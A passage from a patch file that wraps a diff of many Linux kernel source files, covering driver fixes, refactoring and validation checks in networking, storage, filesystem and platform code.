++	if (page_off + *len + tailroom > PAGE_SIZE)
++		return NULL;
++
++	page = alloc_page(GFP_ATOMIC);
+ 	if (!page)
+ 		return NULL;
+ 
+@@ -737,7 +742,6 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 	page_off += *len;
+ 
+ 	while (--*num_buf) {
+-		int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		unsigned int buflen;
+ 		void *buf;
+ 		int off;
+diff --git a/drivers/net/wireless/ath/ath9k/mci.c b/drivers/net/wireless/ath/ath9k/mci.c
+index 3363fc4e89661..a0845002d6fe3 100644
+--- a/drivers/net/wireless/ath/ath9k/mci.c
++++ b/drivers/net/wireless/ath/ath9k/mci.c
+@@ -646,9 +646,7 @@ void ath9k_mci_update_wlan_channels(struct ath_softc *sc, bool allow_all)
+ 	struct ath_hw *ah = sc->sc_ah;
+ 	struct ath9k_hw_mci *mci = &ah->btcoex_hw.mci;
+ 	struct ath9k_channel *chan = ah->curchan;
+-	static const u32 channelmap[] = {
+-		0x00000000, 0xffff0000, 0xffffffff, 0x7fffffff
+-	};
++	u32 channelmap[] = {0x00000000, 0xffff0000, 0xffffffff, 0x7fffffff};
+ 	int i;
+ 	s16 chan_start, chan_end;
+ 	u16 wlan_chan;
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 5c266062c08f0..c35c085dbc877 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -996,10 +996,8 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 		/* No crossing a page as the payload mustn't fragment. */
+ 		if (unlikely((txreq.offset + txreq.size) > XEN_PAGE_SIZE)) {
+-			netdev_err(queue->vif->dev,
+-				   "txreq.offset: %u, size: %u, end: %lu\n",
+-				   txreq.offset, txreq.size,
+-				   (unsigned long)(txreq.offset&~XEN_PAGE_MASK) + txreq.size);
++			netdev_err(queue->vif->dev, "Cross page boundary, txreq.offset: %u, size: %u\n",
++				   txreq.offset, txreq.size);
+ 			xenvif_fatal_tx_err(queue->vif);
+ 			break;
+ 		}
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 1ca52ac163c2f..2c15412649bab 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1605,22 +1605,7 @@ static int nvme_tcp_alloc_queue(struct nvme_ctrl *nctrl, int qid)
+ 	if (ret)
+ 		goto err_init_connect;
+ 
+-	queue->rd_enabled = true;
+ 	set_bit(NVME_TCP_Q_ALLOCATED, &queue->flags);
+-	nvme_tcp_init_recv_ctx(queue);
+-
+-	write_lock_bh(&queue->sock->sk->sk_callback_lock);
+-	queue->sock->sk->sk_user_data = queue;
+-	queue->state_change = queue->sock->sk->sk_state_change;
+-	queue->data_ready = queue->sock->sk->sk_data_ready;
+-	queue->write_space = queue->sock->sk->sk_write_space;
+-	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
+-	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
+-	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
+-#ifdef CONFIG_NET_RX_BUSY_POLL
+-	queue->sock->sk->sk_ll_usec = 1;
+-#endif
+-	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
+ 
+ 	return 0;
+ 
+@@ -1640,7 +1625,7 @@ err_destroy_mutex:
+ 	return ret;
+ }
+ 
+-static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
++static void nvme_tcp_restore_sock_ops(struct nvme_tcp_queue *queue)
+ {
+ 	struct socket *sock = queue->sock;
+ 
+@@ -1655,7 +1640,7 @@ static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
+ static void __nvme_tcp_stop_queue(struct nvme_tcp_queue *queue)
+ {
+ 	kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+-	nvme_tcp_restore_sock_calls(queue);
++	nvme_tcp_restore_sock_ops(queue);
+ 	cancel_work_sync(&queue->io_work);
+ }
+ 
+@@ -1673,21 +1658,42 @@ static void nvme_tcp_stop_queue(struct nvme_ctrl *nctrl, int qid)
+ 	mutex_unlock(&queue->queue_lock);
+ }
+ 
++static void nvme_tcp_setup_sock_ops(struct nvme_tcp_queue *queue)
++{
++	write_lock_bh(&queue->sock->sk->sk_callback_lock);
++	queue->sock->sk->sk_user_data = queue;
++	queue->state_change = queue->sock->sk->sk_state_change;
++	queue->data_ready = queue->sock->sk->sk_data_ready;
++	queue->write_space = queue->sock->sk->sk_write_space;
++	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
++	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
++	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
++#ifdef CONFIG_NET_RX_BUSY_POLL
++	queue->sock->sk->sk_ll_usec = 1;
++#endif
++	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
++}
++
+ static int nvme_tcp_start_queue(struct nvme_ctrl *nctrl, int idx)
+ {
+ 	struct nvme_tcp_ctrl *ctrl = to_tcp_ctrl(nctrl);
++	struct nvme_tcp_queue *queue = &ctrl->queues[idx];
+ 	int ret;
+ 
++	queue->rd_enabled = true;
++	nvme_tcp_init_recv_ctx(queue);
++	nvme_tcp_setup_sock_ops(queue);
++
+ 	if (idx)
+ 		ret = nvmf_connect_io_queue(nctrl, idx);
+ 	else
+ 		ret = nvmf_connect_admin_queue(nctrl);
+ 
+ 	if (!ret) {
+-		set_bit(NVME_TCP_Q_LIVE, &ctrl->queues[idx].flags);
++		set_bit(NVME_TCP_Q_LIVE, &queue->flags);
+ 	} else {
+-		if (test_bit(NVME_TCP_Q_ALLOCATED, &ctrl->queues[idx].flags))
+-			__nvme_tcp_stop_queue(&ctrl->queues[idx]);
++		if (test_bit(NVME_TCP_Q_ALLOCATED, &queue->flags))
++			__nvme_tcp_stop_queue(queue);
+ 		dev_err(nctrl->device,
+ 			"failed to connect queue: %d ret=%d\n", idx, ret);
+ 	}
+diff --git a/drivers/pci/msi/msi.c b/drivers/pci/msi/msi.c
+index 1f716624ca563..ef1d8857a51ba 100644
+--- a/drivers/pci/msi/msi.c
++++ b/drivers/pci/msi/msi.c
+@@ -750,8 +750,7 @@ out_disable:
+ 	return ret;
+ }
+ 
+-static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *entries,
+-				      int nvec, int hwsize)
++static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *entries, int nvec)
+ {
+ 	bool nogap;
+ 	int i, j;
+@@ -762,10 +761,6 @@ static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *en
+ 	nogap = pci_msi_domain_supports(dev, MSI_FLAG_MSIX_CONTIGUOUS, DENY_LEGACY);
+ 
+ 	for (i = 0; i < nvec; i++) {
+-		/* Entry within hardware limit? */
+-		if (entries[i].entry >= hwsize)
+-			return false;
+-
+ 		/* Check for duplicate entries */
+ 		for (j = i + 1; j < nvec; j++) {
+ 			if (entries[i].entry == entries[j].entry)
+@@ -805,7 +800,7 @@ int __pci_enable_msix_range(struct pci_dev *dev, struct msix_entry *entries, int
+ 	if (hwsize < 0)
+ 		return hwsize;
+ 
+-	if (!pci_msix_validate_entries(dev, entries, nvec, hwsize))
++	if (!pci_msix_validate_entries(dev, entries, nvec))
+ 		return -EINVAL;
+ 
+ 	if (hwsize < nvec) {
+diff --git a/drivers/perf/amlogic/meson_g12_ddr_pmu.c b/drivers/perf/amlogic/meson_g12_ddr_pmu.c
+index a78fdb15e26c2..8b643888d5036 100644
+--- a/drivers/perf/amlogic/meson_g12_ddr_pmu.c
++++ b/drivers/perf/amlogic/meson_g12_ddr_pmu.c
+@@ -21,23 +21,23 @@
+ #define DMC_QOS_IRQ		BIT(30)
+ 
+ /* DMC bandwidth monitor register address offset */
+-#define DMC_MON_G12_CTRL0		(0x20  << 2)
+-#define DMC_MON_G12_CTRL1		(0x21  << 2)
+-#define DMC_MON_G12_CTRL2		(0x22  << 2)
+-#define DMC_MON_G12_CTRL3		(0x23  << 2)
+-#define DMC_MON_G12_CTRL4		(0x24  << 2)
+-#define DMC_MON_G12_CTRL5		(0x25  << 2)
+-#define DMC_MON_G12_CTRL6		(0x26  << 2)
+-#define DMC_MON_G12_CTRL7		(0x27  << 2)
+-#define DMC_MON_G12_CTRL8		(0x28  << 2)
+-
+-#define DMC_MON_G12_ALL_REQ_CNT		(0x29  << 2)
+-#define DMC_MON_G12_ALL_GRANT_CNT	(0x2a  << 2)
+-#define DMC_MON_G12_ONE_GRANT_CNT	(0x2b  << 2)
+-#define DMC_MON_G12_SEC_GRANT_CNT	(0x2c  << 2)
+-#define DMC_MON_G12_THD_GRANT_CNT	(0x2d  << 2)
+-#define DMC_MON_G12_FOR_GRANT_CNT	(0x2e  << 2)
+-#define DMC_MON_G12_TIMER		(0x2f  << 2)
++#define DMC_MON_G12_CTRL0		(0x0  << 2)
++#define DMC_MON_G12_CTRL1		(0x1  << 2)
++#define DMC_MON_G12_CTRL2		(0x2  << 2)
++#define DMC_MON_G12_CTRL3		(0x3  << 2)
++#define DMC_MON_G12_CTRL4		(0x4  << 2)
++#define DMC_MON_G12_CTRL5		(0x5  << 2)
++#define DMC_MON_G12_CTRL6		(0x6  << 2)
++#define DMC_MON_G12_CTRL7		(0x7  << 2)
++#define DMC_MON_G12_CTRL8		(0x8  << 2)
++
++#define DMC_MON_G12_ALL_REQ_CNT		(0x9  << 2)
++#define DMC_MON_G12_ALL_GRANT_CNT	(0xa  << 2)
++#define DMC_MON_G12_ONE_GRANT_CNT	(0xb  << 2)
++#define DMC_MON_G12_SEC_GRANT_CNT	(0xc  << 2)
++#define DMC_MON_G12_THD_GRANT_CNT	(0xd  << 2)
++#define DMC_MON_G12_FOR_GRANT_CNT	(0xe  << 2)
++#define DMC_MON_G12_TIMER		(0xf  << 2)
+ 
+ /* Each bit represent a axi line */
+ PMU_FORMAT_ATTR(event, "config:0-7");
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index cb15acdf14a30..e2c9a68d12df9 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -464,7 +464,8 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		.ident = "ASUS ROG FLOW X13",
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "GV301Q"),
++			/* Match GV301** */
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV301"),
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 322cfaeda17ba..2a426040f749e 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -140,6 +140,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 	}}
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("A320M-S2H V2-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+@@ -150,6 +151,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550I AORUS PRO AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M AORUS PRO-P"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M DS3H"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B650 AORUS ELITE AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660 GAMING X DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660I AORUS PRO DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z390 I AORUS PRO WIFI-CF"),
+@@ -159,6 +161,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 GAMING X"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 I AORUS PRO WIFI"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 UD"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570S AORUS ELITE"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z690M AORUS ELITE AX DDR4"),
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index 89c5374e33b32..bcbd522d062bf 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -141,6 +141,7 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 
+ 	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
+ 	if (ret < 0) {
++		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+diff --git a/drivers/pwm/core.c b/drivers/pwm/core.c
+index e01147f66e15a..474725714a05b 100644
+--- a/drivers/pwm/core.c
++++ b/drivers/pwm/core.c
+@@ -115,7 +115,14 @@ static int pwm_device_request(struct pwm_device *pwm, const char *label)
+ 	}
+ 
+ 	if (pwm->chip->ops->get_state) {
+-		struct pwm_state state;
++		/*
++		 * Zero-initialize state because most drivers are unaware of
++		 * .usage_power. The other members of state are supposed to be
++		 * set by lowlevel drivers. We still initialize the whole
++		 * structure for simplicity even though this might paper over
++		 * faulty implementations of .get_state().
++		 */
++		struct pwm_state state = { 0, };
+ 
+ 		err = pwm->chip->ops->get_state(pwm->chip, pwm, &state);
+ 		trace_pwm_get(pwm, &state, err);
+@@ -448,7 +455,7 @@ static void pwm_apply_state_debug(struct pwm_device *pwm,
+ {
+ 	struct pwm_state *last = &pwm->last;
+ 	struct pwm_chip *chip = pwm->chip;
+-	struct pwm_state s1, s2;
++	struct pwm_state s1 = { 0 }, s2 = { 0 };
+ 	int err;
+ 
+ 	if (!IS_ENABLED(CONFIG_PWM_DEBUG))
+@@ -530,6 +537,7 @@ static void pwm_apply_state_debug(struct pwm_device *pwm,
+ 		return;
+ 	}
+ 
++	*last = (struct pwm_state){ 0 };
+ 	err = chip->ops->get_state(chip, pwm, last);
+ 	trace_pwm_get(pwm, last, err);
+ 	if (err)
+diff --git a/drivers/regulator/fan53555.c b/drivers/regulator/fan53555.c
+index 529963a7e4f52..41537c45f0367 100644
+--- a/drivers/regulator/fan53555.c
++++ b/drivers/regulator/fan53555.c
+@@ -8,18 +8,19 @@
+ // Copyright (c) 2012 Marvell Technology Ltd.
+ // Yunfan Zhang <yfzhang@marvell.com>
+ 
++#include <linux/bits.h>
++#include <linux/err.h>
++#include <linux/i2c.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/param.h>
+-#include <linux/err.h>
+ #include <linux/platform_device.h>
++#include <linux/regmap.h>
+ #include <linux/regulator/driver.h>
++#include <linux/regulator/fan53555.h>
+ #include <linux/regulator/machine.h>
+ #include <linux/regulator/of_regulator.h>
+-#include <linux/of_device.h>
+-#include <linux/i2c.h>
+ #include <linux/slab.h>
+-#include <linux/regmap.h>
+-#include <linux/regulator/fan53555.h>
+ 
+ /* Voltage setting */
+ #define FAN53555_VSEL0		0x00
+@@ -60,7 +61,7 @@
+ #define TCS_VSEL1_MODE		(1 << 6)
+ 
+ #define TCS_SLEW_SHIFT		3
+-#define TCS_SLEW_MASK		(0x3 < 3)
++#define TCS_SLEW_MASK		GENMASK(4, 3)
+ 
+ enum fan53555_vendor {
+ 	FAN53526_VENDOR_FAIRCHILD = 0,
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index 3ceece9883383..c895189375e2b 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3298,7 +3298,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 
+ 	spin_lock_irqsave(&instance->crashdump_lock, flags);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+-	if (!instance->crash_dump_buf &&
++	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index dff1d692e756a..b1f9c86ed211f 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -314,11 +314,18 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	if (result)
+ 		return -EIO;
+ 
+-	/* Sanity check that we got the page back that we asked for */
++	/*
++	 * Sanity check that we got the page back that we asked for and that
++	 * the page size is not 0.
++	 */
+ 	if (buffer[1] != page)
+ 		return -EIO;
+ 
+-	return get_unaligned_be16(&buffer[2]) + 4;
++	result = get_unaligned_be16(&buffer[2]);
++	if (!result)
++		return -EIO;
++
++	return result + 4;
+ }
+ 
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+diff --git a/drivers/spi/spi-rockchip-sfc.c b/drivers/spi/spi-rockchip-sfc.c
+index bd87d3c92dd33..69347b6bf60cd 100644
+--- a/drivers/spi/spi-rockchip-sfc.c
++++ b/drivers/spi/spi-rockchip-sfc.c
+@@ -632,7 +632,7 @@ static int rockchip_sfc_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "Failed to request irq\n");
+ 
+-		return ret;
++		goto err_irq;
+ 	}
+ 
+ 	ret = rockchip_sfc_init(sfc);
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index 317aeff6c1dac..a6d77fe41e1a9 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -56,11 +56,9 @@
+ #define BTRFS_DISCARD_DELAY		(120ULL * NSEC_PER_SEC)
+ #define BTRFS_DISCARD_UNUSED_DELAY	(10ULL * NSEC_PER_SEC)
+ 
+-/* Target completion latency of discarding all discardable extents */
+-#define BTRFS_DISCARD_TARGET_MSEC	(6 * 60 * 60UL * MSEC_PER_SEC)
+ #define BTRFS_DISCARD_MIN_DELAY_MSEC	(1UL)
+ #define BTRFS_DISCARD_MAX_DELAY_MSEC	(1000UL)
+-#define BTRFS_DISCARD_MAX_IOPS		(10U)
++#define BTRFS_DISCARD_MAX_IOPS		(1000U)
+ 
+ /* Monotonically decreasing minimum length filters after index 0 */
+ static int discard_minlen[BTRFS_NR_DISCARD_LISTS] = {
+@@ -577,6 +575,7 @@ void btrfs_discard_calc_delay(struct btrfs_discard_ctl *discard_ctl)
+ 	s32 discardable_extents;
+ 	s64 discardable_bytes;
+ 	u32 iops_limit;
++	unsigned long min_delay = BTRFS_DISCARD_MIN_DELAY_MSEC;
+ 	unsigned long delay;
+ 
+ 	discardable_extents = atomic_read(&discard_ctl->discardable_extents);
+@@ -607,13 +606,19 @@ void btrfs_discard_calc_delay(struct btrfs_discard_ctl *discard_ctl)
+ 	}
+ 
+ 	iops_limit = READ_ONCE(discard_ctl->iops_limit);
+-	if (iops_limit)
++
++	if (iops_limit) {
+ 		delay = MSEC_PER_SEC / iops_limit;
+-	else
+-		delay = BTRFS_DISCARD_TARGET_MSEC / discardable_extents;
++	} else {
++		/*
++		 * Unset iops_limit means go as fast as possible, so allow a
++		 * delay of 0.
++		 */
++		delay = 0;
++		min_delay = 0;
++	}
+ 
+-	delay = clamp(delay, BTRFS_DISCARD_MIN_DELAY_MSEC,
+-		      BTRFS_DISCARD_MAX_DELAY_MSEC);
++	delay = clamp(delay, min_delay, BTRFS_DISCARD_MAX_DELAY_MSEC);
+ 	discard_ctl->delay_ms = delay;
+ 
+ 	spin_unlock(&discard_ctl->lock);
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+index cb40074feb3e9..0329a907bdfe8 100644
+--- a/fs/cifs/cifs_dfs_ref.c
++++ b/fs/cifs/cifs_dfs_ref.c
+@@ -171,8 +171,6 @@ static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ 		mnt = ERR_CAST(full_path);
+ 		goto out;
+ 	}
+-
+-	convert_delimiter(full_path, '/');
+ 	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+ 
+ 	tmp = *cur_ctx;
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 13f26e01f7b97..0b8cbf721fff6 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -34,19 +34,33 @@ static inline int dfs_get_referral(struct cifs_mount_ctx *mnt_ctx, const char *p
+ 			      cifs_remap(cifs_sb), path, ref, tl);
+ }
+ 
++/* Return DFS full path out of a dentry set for automount */
+ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ {
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
+ 	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+ 	struct TCP_Server_Info *server = tcon->ses->server;
++	size_t len;
++	char *s;
+ 
+ 	if (unlikely(!server->origin_fullpath))
+ 		return ERR_PTR(-EREMOTE);
+ 
+-	return __build_path_from_dentry_optional_prefix(dentry, page,
+-							server->origin_fullpath,
+-							strlen(server->origin_fullpath),
+-							true);
++	s = dentry_path_raw(dentry, page, PATH_MAX);
++	if (IS_ERR(s))
++		return s;
++	/* for root, we want "" */
++	if (!s[1])
++		s++;
++
++	len = strlen(server->origin_fullpath);
++	if (s < (char *)page + len)
++		return ERR_PTR(-ENAMETOOLONG);
++
++	s -= len;
++	memcpy(s, server->origin_fullpath, len);
++	convert_delimiter(s, '/');
++	return s;
+ }
+ 
+ static inline void dfs_put_root_smb_sessions(struct list_head *head)
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 6fba5a52127b2..713e2d97935ff 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -976,6 +976,16 @@ restart:
+ 			continue;
+ 		}
+ 
++		/*
++		 * If wb_tryget fails, the wb has been shutdown, skip it.
++		 *
++		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
++		 * continuing iteration from @wb after dropping and
++		 * regrabbing rcu read lock.
++		 */
++		if (!wb_tryget(wb))
++			continue;
++
+ 		/* alloc failed, execute synchronously using on-stack fallback */
+ 		work = &fallback_work;
+ 		*work = *base_work;
+@@ -984,13 +994,6 @@ restart:
+ 		work->done = &fallback_work_done;
+ 
+ 		wb_queue_work(wb, work);
+-
+-		/*
+-		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
+-		 * continuing iteration from @wb after dropping and
+-		 * regrabbing rcu read lock.
+-		 */
+-		wb_get(wb);
+ 		last_wb = wb;
+ 
+ 		rcu_read_unlock();
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 7aea13c33ddf3..5b15746055927 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -430,6 +430,23 @@ static int nilfs_segctor_reset_segment_buffer(struct nilfs_sc_info *sci)
+ 	return 0;
+ }
+ 
++/**
++ * nilfs_segctor_zeropad_segsum - zero pad the rest of the segment summary area
++ * @sci: segment constructor object
++ *
++ * nilfs_segctor_zeropad_segsum() zero-fills unallocated space at the end of
++ * the current segment summary block.
++ */
++static void nilfs_segctor_zeropad_segsum(struct nilfs_sc_info *sci)
++{
++	struct nilfs_segsum_pointer *ssp;
++
++	ssp = sci->sc_blk_cnt > 0 ? &sci->sc_binfo_ptr : &sci->sc_finfo_ptr;
++	if (ssp->offset < ssp->bh->b_size)
++		memset(ssp->bh->b_data + ssp->offset, 0,
++		       ssp->bh->b_size - ssp->offset);
++}
++
+ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ {
+ 	sci->sc_nblk_this_inc += sci->sc_curseg->sb_sum.nblocks;
+@@ -438,6 +455,7 @@ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ 				* The current segment is filled up
+ 				* (internal code)
+ 				*/
++	nilfs_segctor_zeropad_segsum(sci);
+ 	sci->sc_curseg = NILFS_NEXT_SEGBUF(sci->sc_curseg);
+ 	return nilfs_segctor_reset_segment_buffer(sci);
+ }
+@@ -542,6 +560,7 @@ static int nilfs_segctor_add_file_block(struct nilfs_sc_info *sci,
+ 		goto retry;
+ 	}
+ 	if (unlikely(required)) {
++		nilfs_segctor_zeropad_segsum(sci);
+ 		err = nilfs_segbuf_extend_segsum(segbuf);
+ 		if (unlikely(err))
+ 			goto failed;
+@@ -1531,6 +1550,7 @@ static int nilfs_segctor_collect(struct nilfs_sc_info *sci,
+ 		nadd = min_t(int, nadd << 1, SC_MAX_SEGDELTA);
+ 		sci->sc_stage = prev_stage;
+ 	}
++	nilfs_segctor_zeropad_segsum(sci);
+ 	nilfs_segctor_truncate_segments(sci, sci->sc_curseg, nilfs->ns_sufile);
+ 	return 0;
+ 
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index cc694846617a5..154c103eca751 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1966,8 +1966,10 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 	ret = -EFAULT;
+ 	if (copy_from_user(&uffdio_api, buf, sizeof(uffdio_api)))
+ 		goto out;
+-	/* Ignore unsupported features (userspace built against newer kernel) */
+-	features = uffdio_api.features & UFFD_API_FEATURES;
++	features = uffdio_api.features;
++	ret = -EINVAL;
++	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+ 		goto err_out;
+diff --git a/include/acpi/actypes.h b/include/acpi/actypes.h
+index 95e4f56f97546..1b4f81f1ac5db 100644
+--- a/include/acpi/actypes.h
++++ b/include/acpi/actypes.h
+@@ -723,8 +723,7 @@ typedef u32 acpi_event_type;
+ #define ACPI_EVENT_POWER_BUTTON         2
+ #define ACPI_EVENT_SLEEP_BUTTON         3
+ #define ACPI_EVENT_RTC                  4
+-#define ACPI_EVENT_PCIE_WAKE            5
+-#define ACPI_EVENT_MAX                  5
++#define ACPI_EVENT_MAX                  4
+ #define ACPI_NUM_FIXED_EVENTS           ACPI_EVENT_MAX + 1
+ 
+ /*
+diff --git a/include/linux/kmsan.h b/include/linux/kmsan.h
+index e38ae3c346184..30b17647ce3c7 100644
+--- a/include/linux/kmsan.h
++++ b/include/linux/kmsan.h
+@@ -134,11 +134,12 @@ void kmsan_kfree_large(const void *ptr);
+  * @page_shift:	page_shift passed to vmap_range_noflush().
+  *
+  * KMSAN maps shadow and origin pages of @pages into contiguous ranges in
+- * vmalloc metadata address range.
++ * vmalloc metadata address range. Returns 0 on success, callers must check
++ * for non-zero return value.
+  */
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift);
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift);
+ 
+ /**
+  * kmsan_vunmap_kernel_range_noflush() - Notify KMSAN about a vunmap.
+@@ -159,11 +160,12 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end);
+  * @page_shift:	page_shift argument passed to vmap_range_noflush().
+  *
+  * KMSAN creates new metadata pages for the physical pages mapped into the
+- * virtual memory.
++ * virtual memory. Returns 0 on success, callers must check for non-zero return
++ * value.
+  */
+-void kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift);
++int kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift);
+ 
+ /**
+  * kmsan_iounmap_page_range() - Notify KMSAN about a iounmap_page_range() call.
+@@ -281,12 +283,13 @@ static inline void kmsan_kfree_large(const void *ptr)
+ {
+ }
+ 
+-static inline void kmsan_vmap_pages_range_noflush(unsigned long start,
+-						  unsigned long end,
+-						  pgprot_t prot,
+-						  struct page **pages,
+-						  unsigned int page_shift)
++static inline int kmsan_vmap_pages_range_noflush(unsigned long start,
++						 unsigned long end,
++						 pgprot_t prot,
++						 struct page **pages,
++						 unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+@@ -294,12 +297,12 @@ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+ {
+ }
+ 
+-static inline void kmsan_ioremap_page_range(unsigned long start,
+-					    unsigned long end,
+-					    phys_addr_t phys_addr,
+-					    pgprot_t prot,
+-					    unsigned int page_shift)
++static inline int kmsan_ioremap_page_range(unsigned long start,
++					   unsigned long end,
++					   phys_addr_t phys_addr, pgprot_t prot,
++					   unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_iounmap_page_range(unsigned long start,
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 4c8492401a101..a1e7920f14ebc 100644
